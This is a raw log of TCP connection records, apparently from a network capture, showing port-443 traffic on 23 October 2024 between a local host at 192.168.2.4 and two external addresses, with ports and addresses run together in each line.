                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.251336098 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.775568962 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.775608063 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.775641918 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.775688887 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.775713921 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.775741100 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.775768042 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.776613951 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.776670933 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.776686907 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.776691914 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.776730061 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.777076960 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.892288923 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.892375946 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.892394066 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.892419100 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.892544031 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.893547058 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.893563032 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.916415930 CEST49745443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.916476965 CEST4434974595.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.916568041 CEST49745443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.916949987 CEST49745443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.916960955 CEST4434974595.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:26.076627970 CEST4434974595.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:26.076725006 CEST49745443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:26.080493927 CEST49745443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:26.080502987 CEST4434974595.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:26.080765009 CEST4434974595.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:26.082140923 CEST49745443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:26.089220047 CEST49745443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:26.131334066 CEST4434974595.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:27.248720884 CEST4434974595.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:27.248807907 CEST4434974595.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:27.248945951 CEST49745443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:27.251414061 CEST49745443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:27.251424074 CEST4434974595.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:27.253567934 CEST49747443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:27.253578901 CEST4434974795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:27.253675938 CEST49747443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:27.253863096 CEST49747443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:27.253873110 CEST4434974795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.135792971 CEST4434974795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.135905981 CEST49747443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.136339903 CEST49747443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.136344910 CEST4434974795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.138108969 CEST49747443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.138113976 CEST4434974795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.798448086 CEST4434974795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.798538923 CEST4434974795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.798595905 CEST49747443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.798618078 CEST49747443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.798892021 CEST49747443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.798907042 CEST4434974795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.810213089 CEST49748443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.810264111 CEST4434974895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.810334921 CEST49748443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.810574055 CEST49748443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.810586929 CEST4434974895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:29.688585043 CEST4434974895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:29.688673019 CEST49748443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:29.689208984 CEST49748443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:29.689219952 CEST4434974895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:29.690880060 CEST49748443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:29.690885067 CEST4434974895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:30.352220058 CEST4434974895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:30.352248907 CEST4434974895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:30.352330923 CEST4434974895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:30.352341890 CEST49748443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:30.352360010 CEST49748443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:30.352396011 CEST49748443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:30.352612972 CEST49748443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:30.352623940 CEST4434974895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:30.365467072 CEST49749443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:30.365509987 CEST4434974995.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:30.365611076 CEST49749443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:30.365830898 CEST49749443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:30.365844965 CEST4434974995.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:31.232182026 CEST4434974995.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:31.232343912 CEST49749443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:31.232970953 CEST49749443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:31.232983112 CEST4434974995.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:31.234797955 CEST49749443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:31.234803915 CEST4434974995.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:31.883304119 CEST4434974995.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:31.883342028 CEST4434974995.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:31.883424997 CEST4434974995.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:31.883441925 CEST49749443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:31.883476973 CEST49749443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:31.883523941 CEST49749443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:31.883907080 CEST49749443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:31.883932114 CEST4434974995.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:31.895486116 CEST49750443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:31.895536900 CEST4434975095.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.337419987 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.337477922 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.368374109 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.368401051 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.368546009 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.368556976 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.368628025 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.465082884 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.465126991 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.465260029 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.465272903 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.465322018 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.484648943 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.484671116 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.484749079 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.484757900 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.484826088 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.584180117 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.584207058 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.584363937 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.584392071 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.584467888 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.600559950 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.600600004 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.600723982 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.600735903 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.600814104 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.697539091 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.697571039 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.697737932 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.697808027 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.697911024 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.716382980 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.716408014 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.716618061 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.716655016 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.716737986 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.801768064 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.801800013 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.801923990 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.801950932 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.802026987 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.824897051 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.824929953 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.825041056 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.825062037 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.825109959 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.913058043 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.913084030 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.913491011 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.913516045 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.913590908 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.932689905 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.932714939 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.932954073 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.932975054 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.933028936 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.949234962 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.949263096 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.949410915 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.949419975 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:37.949534893 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.049274921 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.049304008 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.049390078 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.049405098 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.049562931 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.058100939 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.058119059 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.058238029 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.058247089 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.058341026 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.144326925 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.144355059 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.144494057 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.144504070 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.144576073 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.165693045 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.165719986 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.165937901 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.165949106 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.166006088 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.181122065 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.181143999 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.181287050 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.181298018 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.181350946 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.280186892 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.280213118 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.280303001 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.280317068 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.280369997 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.289819956 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.289835930 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.289979935 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.289990902 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.290095091 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:38.297488928 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.159524918 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.211029053 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.211056948 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.211158037 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.211173058 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.211239100 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.222142935 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.222163916 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.222244024 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.222281933 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.222349882 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.226411104 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.226427078 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.226490021 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.226497889 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.226569891 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.286442041 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.286463976 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.286560059 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.286577940 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.286645889 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.327497959 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.327523947 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.327605009 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.327615023 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.327680111 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.337471008 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.337486982 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.337559938 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.337568045 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.337610006 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.338761091 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.338777065 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.338845015 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.338855028 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.338920116 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.348655939 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.348675966 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.348743916 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.348752975 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.348800898 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.442645073 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.442672968 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.442914009 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.442935944 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.443008900 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.453459024 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.453480005 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.453569889 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.453577995 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.453646898 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.454602957 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.454618931 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.454683065 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.454689980 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.454749107 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.463915110 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.463933945 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.464020014 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.464054108 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.464104891 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.518624067 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.518645048 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.518775940 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.518789053 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.518857002 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.559823036 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.559842110 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.559938908 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.559967995 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.560014009 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.572621107 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.572638035 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.572763920 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.572782993 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.572797060 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.572815895 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.572844982 CEST49752443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.572861910 CEST4434975295.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:39.572880030 CEST49752443192.168.2.495.217.220.103
